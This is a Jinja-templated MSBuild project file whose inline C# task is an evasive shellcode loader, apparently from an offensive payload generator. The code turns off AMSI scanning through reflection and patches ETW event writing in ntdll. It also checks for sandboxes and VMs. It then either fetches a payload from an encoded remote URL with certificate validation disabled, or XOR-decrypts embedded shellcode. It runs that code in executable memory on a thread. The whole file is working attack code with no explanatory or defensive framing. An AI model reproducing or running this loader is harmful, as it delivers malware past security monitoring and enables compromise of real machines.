<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="{{ v.target_name }}">
    <{{ v.task_name }} />
  </Target>

  <UsingTask
    TaskName="{{ v.task_name }}"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll">
    <ParameterGroup />
    <Task>
      <Reference Include="System" />
      <Reference Include="System.Runtime.InteropServices" />
      <Reference Include="System.IO.Compression" />
      <Using Namespace="System" />
      <Using Namespace="System.Runtime.InteropServices" />
      <Using Namespace="System.Reflection" />
      <Using Namespace="System.Threading" />
      <Code Type="Class" Language="cs">
      <![CDATA[
        using System;
        using System.IO;
        using System.Reflection;
        using System.Runtime.InteropServices;
        using System.Threading;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;

        public class {{ v.task_name }} : Task, ITask {

            [UnmanagedFunctionPointer(CallingConvention.StdCall)]
            private delegate int {{ v.del_nt_alloc }}(IntPtr ph, ref IntPtr ba, IntPtr zb, ref IntPtr rs, uint at, uint prot);
            [UnmanagedFunctionPointer(CallingConvention.StdCall)]
            private delegate int {{ v.del_nt_prot }}(IntPtr ph, ref IntPtr ba, ref IntPtr sz, uint np, out uint op);

            static string {{ v.mb_fn_b }}(int[] c) {
                var {{ v.mb_lv_b_sb }} = new System.Text.StringBuilder();
                foreach (var {{ v.mb_lv_b_x }} in c) {{ v.mb_lv_b_sb }}.Append((char){{ v.mb_lv_b_x }});
                return {{ v.mb_lv_b_sb }}.ToString();
            }

            static byte[] {{ v.mb_fn_n }}(int[] c) { var {{ v.mb_lv_n_b }}=new byte[c.Length+1]; for(int {{ v.mb_lv_n_i }}=0;{{ v.mb_lv_n_i }}<c.Length;{{ v.mb_lv_n_i }}++) {{ v.mb_lv_n_b }}[{{ v.mb_lv_n_i }}]=(byte)c[{{ v.mb_lv_n_i }}]; return {{ v.mb_lv_n_b }}; }

            static IntPtr {{ v.fn_getexport }}(IntPtr mod, byte[] name) {
                try {
                    int {{ v.mb_lv_ge_peo }}    = Marshal.ReadInt32(mod, 0x3C);
                    int {{ v.mb_lv_ge_exprva }} = Marshal.ReadInt32(IntPtr.Add(mod, {{ v.mb_lv_ge_peo }} + 0x88));
                    if ({{ v.mb_lv_ge_exprva }} == 0) return IntPtr.Zero;
                    IntPtr {{ v.mb_lv_ge_ed }}  = IntPtr.Add(mod, {{ v.mb_lv_ge_exprva }});
                    int {{ v.mb_lv_ge_nn }}   = Marshal.ReadInt32({{ v.mb_lv_ge_ed }}, 0x18);
                    int {{ v.mb_lv_ge_nrva }} = Marshal.ReadInt32({{ v.mb_lv_ge_ed }}, 0x20);
                    int {{ v.mb_lv_ge_orva }} = Marshal.ReadInt32({{ v.mb_lv_ge_ed }}, 0x24);
                    int {{ v.mb_lv_ge_frva }} = Marshal.ReadInt32({{ v.mb_lv_ge_ed }}, 0x1C);
                    for (int {{ v.mb_lv_ge_i }} = 0; {{ v.mb_lv_ge_i }} < {{ v.mb_lv_ge_nn }}; {{ v.mb_lv_ge_i }}++) {
                        IntPtr {{ v.mb_lv_ge_np }} = IntPtr.Add(mod, Marshal.ReadInt32(IntPtr.Add(mod, {{ v.mb_lv_ge_nrva }} + {{ v.mb_lv_ge_i }}*4)));
                        bool {{ v.mb_lv_ge_ok }} = true;
                        for (int {{ v.mb_lv_ge_j }} = 0; {{ v.mb_lv_ge_j }} < name.Length; {{ v.mb_lv_ge_j }}++)
                            if (Marshal.ReadByte(IntPtr.Add({{ v.mb_lv_ge_np }}, {{ v.mb_lv_ge_j }})) != name[{{ v.mb_lv_ge_j }}]) { {{ v.mb_lv_ge_ok }} = false; break; }
                        if (!{{ v.mb_lv_ge_ok }}) continue;
                        short {{ v.mb_lv_ge_ord }} = Marshal.ReadInt16(IntPtr.Add(mod, {{ v.mb_lv_ge_orva }} + {{ v.mb_lv_ge_i }}*2));
                        return IntPtr.Add(mod, Marshal.ReadInt32(IntPtr.Add(mod, {{ v.mb_lv_ge_frva }} + {{ v.mb_lv_ge_ord }}*4)));
                    }
                } catch {}
                return IntPtr.Zero;
            }

            static void {{ v.fn_amsi }}() {
                try {
                    var {{ v.mb_lv_am_t }} = Type.GetType({{ v.mb_fn_b }}(new int[]{ {{ v.jsc_auto_amsi_utils }} }));
                    if ({{ v.mb_lv_am_t }} != null) {
                        var {{ v.mb_lv_am_f }} = {{ v.mb_lv_am_t }}.GetField({{ v.mb_fn_b }}(new int[]{ {{ v.jsc_amsi_init_fail }} }),
                            BindingFlags.NonPublic | BindingFlags.Static);
                        if ({{ v.mb_lv_am_f }} != null) {{ v.mb_lv_am_f }}.SetValue(null, true);
                    }
                } catch {}
            }

            static void {{ v.fn_etw }}(IntPtr ntdll) {
                try {
                    byte[] {{ v.mb_lv_ew_tgt }} = {{ v.mb_fn_n }}(new int[]{ {{ v.jsc_etw_event_write }} });
                    IntPtr {{ v.mb_lv_ew_fn }}  = {{ v.fn_getexport }}(ntdll, {{ v.mb_lv_ew_tgt }});
                    if ({{ v.mb_lv_ew_fn }} == IntPtr.Zero) return;
                    byte[] {{ v.mb_lv_ew_protn }} = {{ v.mb_fn_n }}(new int[]{ {{ v.jsc_nt_prot_vm }} });
                    IntPtr {{ v.mb_lv_ew_protaddr }} = {{ v.fn_getexport }}(ntdll, {{ v.mb_lv_ew_protn }});
                    if ({{ v.mb_lv_ew_protaddr }} == IntPtr.Zero) return;
                    var {{ v.mb_lv_ew_ntprot }} = ({{ v.del_nt_prot }})Marshal.GetDelegateForFunctionPointer({{ v.mb_lv_ew_protaddr }}, typeof({{ v.del_nt_prot }}));
                    IntPtr {{ v.mb_lv_ew_ph }} = (IntPtr)(-1);
                    IntPtr {{ v.mb_lv_ew_ba }} = {{ v.mb_lv_ew_fn }}; IntPtr {{ v.mb_lv_ew_sz }} = (IntPtr)3; uint {{ v.mb_lv_ew_old }};
                    {{ v.mb_lv_ew_ntprot }}({{ v.mb_lv_ew_ph }}, ref {{ v.mb_lv_ew_ba }}, ref {{ v.mb_lv_ew_sz }}, 0x40, out {{ v.mb_lv_ew_old }});
                    Marshal.WriteByte({{ v.mb_lv_ew_fn }}, 0, 0x33);
                    Marshal.WriteByte({{ v.mb_lv_ew_fn }}, 1, 0xC0);
                    Marshal.WriteByte({{ v.mb_lv_ew_fn }}, 2, 0xC3);
                    IntPtr {{ v.mb_lv_ew_ba2 }} = {{ v.mb_lv_ew_fn }}; IntPtr {{ v.mb_lv_ew_sz2 }} = (IntPtr)3;
                    {{ v.mb_lv_ew_ntprot }}({{ v.mb_lv_ew_ph }}, ref {{ v.mb_lv_ew_ba2 }}, ref {{ v.mb_lv_ew_sz2 }}, {{ v.mb_lv_ew_old }}, out {{ v.mb_lv_ew_old }});
                } catch {}
            }

            static bool {{ v.fn_sandbox }}() {
                try {
                    string {{ v.mb_lv_sb_u }} = Environment.UserName.ToLower();
                    string[] {{ v.mb_lv_sb_badu }} = new string[]{ {{ v.mb_fn_b }}(new int[]{115,97,110,100,98,111,120}),{{ v.mb_fn_b }}(new int[]{109,97,108,116,101,115,116}),{{ v.mb_fn_b }}(new int[]{118,105,114,117,115}),{{ v.mb_fn_b }}(new int[]{99,117,99,107,111,111}),{{ v.mb_fn_b }}(new int[]{117,115,101,114}),{{ v.mb_fn_b }}(new int[]{116,101,115,116}) };
                    foreach (var {{ v.mb_lv_sb_b }} in {{ v.mb_lv_sb_badu }}) if ({{ v.mb_lv_sb_u }} == {{ v.mb_lv_sb_b }}) return true;
                    var {{ v.mb_lv_sb_di }} = new System.IO.DriveInfo("C");
                    if ({{ v.mb_lv_sb_di }}.TotalSize < 53687091200L) return true;
                    string {{ v.mb_lv_sb_cn }} = Environment.MachineName.ToLower();
                    if ({{ v.mb_lv_sb_cn }}.Contains({{ v.mb_fn_b }}(new int[]{115,97,110,100,98,111,120}))) return true;
                    if ({{ v.mb_lv_sb_cn }}.Contains({{ v.mb_fn_b }}(new int[]{97,110,97,108,121,115,105,115}))) return true;
                    if (Environment.GetEnvironmentVariable({{ v.mb_fn_b }}(new int[]{ {{ v.jsc_env_vbox }} })) != null) return true;
                    if (Environment.GetEnvironmentVariable({{ v.mb_fn_b }}(new int[]{ {{ v.jsc_env_sandboxie }} })) != null) return true;
                } catch {}
                return false;
            }

            static byte[] {{ v.fn_decrypt }}(byte[] data, byte[] key) {
                var {{ v.mb_lv_dc_o }} = new byte[data.Length];
                for (int {{ v.mb_lv_dc_i }} = 0; {{ v.mb_lv_dc_i }} < data.Length; {{ v.mb_lv_dc_i }}++) {{ v.mb_lv_dc_o }}[{{ v.mb_lv_dc_i }}] = (byte)(data[{{ v.mb_lv_dc_i }}] ^ key[{{ v.mb_lv_dc_i }} % key.Length]);
                return {{ v.mb_lv_dc_o }};
            }

            static byte[] {{ v.fn_hex }}(string h) {
                var {{ v.mb_lv_hx_b }} = new byte[h.Length / 2];
                for (int {{ v.mb_lv_hx_i }} = 0; {{ v.mb_lv_hx_i }} < {{ v.mb_lv_hx_b }}.Length; {{ v.mb_lv_hx_i }}++)
                    {{ v.mb_lv_hx_b }}[{{ v.mb_lv_hx_i }}] = Convert.ToByte(h.Substring({{ v.mb_lv_hx_i }} * 2, 2), 16);
                return {{ v.mb_lv_hx_b }};
            }

            public override bool Execute() {
                if ({{ v.fn_sandbox }}()) return false;

                IntPtr {{ v.mb_lv_ex_ntdll }} = IntPtr.Zero;
                foreach (System.Diagnostics.ProcessModule {{ v.mb_lv_ex_m }} in
                         System.Diagnostics.Process.GetCurrentProcess().Modules)
                    if ({{ v.mb_lv_ex_m }}.ModuleName.ToLower() == {{ v.mb_fn_b }}(new int[]{ {{ v.jsc_ntdll_dll }} })) {
                        {{ v.mb_lv_ex_ntdll }} = {{ v.mb_lv_ex_m }}.BaseAddress; break;
                    }
                if ({{ v.mb_lv_ex_ntdll }} == IntPtr.Zero) return false;

                {{ v.fn_amsi }}();
                {{ v.fn_etw }}({{ v.mb_lv_ex_ntdll }});
                Thread.Sleep(2000 + new Random().Next(3000));

                {%- if is_staged %}
                byte[] {{ sg.sg_lv_url }} = new byte[]{ {% for b in staged_url_enc %}{{ b }},{% endfor %} };
                for (int {{ sg.sg_lv_i }} = 0; {{ sg.sg_lv_i }} < {{ sg.sg_lv_url }}.Length; {{ sg.sg_lv_i }}++) {{ sg.sg_lv_url }}[{{ sg.sg_lv_i }}] ^= (byte){{ staged_url_xk }};
                byte[] {{ sg.sg_lv_jwt }} = new byte[]{ {% for b in staged_jwt_enc %}{{ b }},{% endfor %} };
                for (int {{ sg.sg_lv_i }} = 0; {{ sg.sg_lv_i }} < {{ sg.sg_lv_jwt }}.Length; {{ sg.sg_lv_i }}++) {{ sg.sg_lv_jwt }}[{{ sg.sg_lv_i }}] ^= (byte){{ staged_jwt_xk }};
                byte[] {{ sg.sg_lv_ua }} = new byte[]{ {% for b in staged_ua_enc %}{{ b }},{% endfor %} };
                for (int {{ sg.sg_lv_i }} = 0; {{ sg.sg_lv_i }} < {{ sg.sg_lv_ua }}.Length; {{ sg.sg_lv_i }}++) {{ sg.sg_lv_ua }}[{{ sg.sg_lv_i }}] ^= (byte){{ staged_ua_xk }};
                byte[] {{ v.mb_lv_ex_sc }};
                try {
                    System.Net.ServicePointManager.ServerCertificateValidationCallback = (a,b,c,d) => true;
                    System.Net.ServicePointManager.SecurityProtocol =
                        (System.Net.SecurityProtocolType)3072 | (System.Net.SecurityProtocolType)768;
                    var {{ sg.sg_lv_req }} = (System.Net.HttpWebRequest)System.Net.WebRequest.Create(
                        System.Text.Encoding.ASCII.GetString({{ sg.sg_lv_url }}));
                    {{ sg.sg_lv_req }}.Method = "GET";
                    {{ sg.sg_lv_req }}.UserAgent = System.Text.Encoding.ASCII.GetString({{ sg.sg_lv_ua }});
                    {{ sg.sg_lv_req }}.Headers["Authorization"] = "Bearer " + System.Text.Encoding.ASCII.GetString({{ sg.sg_lv_jwt }});
                    using (var {{ sg.sg_lv_resp }} = ({{ sg.sg_lv_req }}.GetResponse() as System.Net.HttpWebResponse))
                    using (var {{ sg.sg_lv_buf }} = new System.IO.MemoryStream()) {
                        if ((int){{ sg.sg_lv_resp }}.StatusCode != 200) return false;
                        {{ sg.sg_lv_resp }}.GetResponseStream().CopyTo({{ sg.sg_lv_buf }});
                        {{ v.mb_lv_ex_sc }} = {{ sg.sg_lv_buf }}.ToArray();
                    }
                } catch { return false; }
                for (int {{ sg.sg_lv_i }} = 0; {{ sg.sg_lv_i }} < {{ sg.sg_lv_jwt }}.Length; {{ sg.sg_lv_i }}++) {{ sg.sg_lv_jwt }}[{{ sg.sg_lv_i }}] = 0;
                {%- else %}
                byte[] {{ v.mb_lv_ex_k }} = {{ v.fn_hex }}({% for chunk in key_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %});
                for (int {{ v.mb_lv_ex_ki }} = 0; {{ v.mb_lv_ex_ki }} < {{ v.mb_lv_ex_k }}.Length; {{ v.mb_lv_ex_ki }}++) {{ v.mb_lv_ex_k }}[{{ v.mb_lv_ex_ki }}] ^= (byte){{ key_tweak }};
                byte[] {{ v.mb_lv_ex_sc }} = {{ v.fn_decrypt }}({{ v.fn_hex }}({% for chunk in shellcode_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %}), {{ v.mb_lv_ex_k }});
                {%- if is_compressed %}
                using (var _csm = new System.IO.MemoryStream({{ v.mb_lv_ex_sc }}))
                using (var _ds  = new System.IO.Compression.DeflateStream(_csm,
                                      System.IO.Compression.CompressionMode.Decompress))
                using (var _dsm = new System.IO.MemoryStream()) {
                    _ds.CopyTo(_dsm);
                    {{ v.mb_lv_ex_sc }} = _dsm.ToArray();
                }
                {%- endif %}
                {%- endif %}

                byte[] {{ v.mb_lv_ex_allocn }} = {{ v.mb_fn_n }}(new int[]{ {{ v.jsc_nt_alloc_vm }} });
                byte[] {{ v.mb_lv_ex_protn }}  = {{ v.mb_fn_n }}(new int[]{ {{ v.jsc_nt_prot_vm }} });
                IntPtr {{ v.mb_lv_ex_allocaddr }} = {{ v.fn_getexport }}({{ v.mb_lv_ex_ntdll }}, {{ v.mb_lv_ex_allocn }});
                IntPtr {{ v.mb_lv_ex_protaddr }}  = {{ v.fn_getexport }}({{ v.mb_lv_ex_ntdll }}, {{ v.mb_lv_ex_protn }});
                if ({{ v.mb_lv_ex_allocaddr }} == IntPtr.Zero || {{ v.mb_lv_ex_protaddr }} == IntPtr.Zero) return false;

                var {{ v.fn_nt_alloc }} = ({{ v.del_nt_alloc }})Marshal.GetDelegateForFunctionPointer({{ v.mb_lv_ex_allocaddr }}, typeof({{ v.del_nt_alloc }}));
                var {{ v.fn_nt_prot }}  = ({{ v.del_nt_prot }})Marshal.GetDelegateForFunctionPointer({{ v.mb_lv_ex_protaddr }},  typeof({{ v.del_nt_prot }}));

                IntPtr {{ v.mb_lv_ex_ph }}  = (IntPtr)(-1);
                IntPtr {{ v.mb_lv_ex_mem }} = IntPtr.Zero;
                IntPtr {{ v.mb_lv_ex_rsz }} = (IntPtr){{ v.mb_lv_ex_sc }}.Length;
                if ({{ v.fn_nt_alloc }}({{ v.mb_lv_ex_ph }}, ref {{ v.mb_lv_ex_mem }}, IntPtr.Zero, ref {{ v.mb_lv_ex_rsz }}, 0x3000, 0x04) != 0 || {{ v.mb_lv_ex_mem }} == IntPtr.Zero) return false;
                Marshal.Copy({{ v.mb_lv_ex_sc }}, 0, {{ v.mb_lv_ex_mem }}, {{ v.mb_lv_ex_sc }}.Length);
                IntPtr {{ v.mb_lv_ex_psz }} = (IntPtr){{ v.mb_lv_ex_sc }}.Length;
                uint {{ v.mb_lv_ex_oldprot }};
                {{ v.fn_nt_prot }}({{ v.mb_lv_ex_ph }}, ref {{ v.mb_lv_ex_mem }}, ref {{ v.mb_lv_ex_psz }}, 0x20, out {{ v.mb_lv_ex_oldprot }});

                var {{ v.mb_lv_ex_fnthread }} = new Thread(() => {
                    var {{ v.mb_lv_ex_fn }} = (Action)Marshal.GetDelegateForFunctionPointer({{ v.mb_lv_ex_mem }}, typeof(Action));
                    {{ v.mb_lv_ex_fn }}();
                });
                {{ v.mb_lv_ex_fnthread }}.IsBackground = true;
                {{ v.mb_lv_ex_fnthread }}.Start();
                {{ v.mb_lv_ex_fnthread }}.Join();
                return true;
            }
        }
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
